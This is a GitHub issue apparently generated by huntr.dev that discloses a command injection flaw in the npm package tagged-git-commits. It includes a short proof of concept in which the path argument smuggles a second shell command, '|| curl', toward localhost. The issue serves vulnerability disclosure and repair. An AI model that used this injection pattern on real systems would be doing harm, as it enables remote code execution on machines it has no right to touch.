Security Notice & Bug Bounty - Remote Code Execution - huntr.dev

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

## Vulnerability Description

The issue occurs because a `user input` is formatted inside a `command` that will be executed without any check. The issue arises here: https://github.com/aichbauer/node-tagged-git-commits/blob/master/index.js#L29

## PoC

```js
// poc.js
const taggedCommits = require('tagged-git-commits');

taggedCommits({
	path: './git || curl "http://localhost/RCE"',
});
```

## Impact
`RCE` on `tagged-git-commits` via `insecure command formatting`


# Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

We will submit a pull request directly to your repository with the fix as soon as possible. Want to learn more? Go to https://github.com/418sec/huntr 📚

_Automatically generated by @huntr-helper..._

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #3

Vulnerability Description

PoC

Impact

Bug Bounty

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Security Notice & Bug Bounty - Remote Code Execution - huntr.dev #3

Description

Vulnerability Description

PoC

Impact

Bug Bounty

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions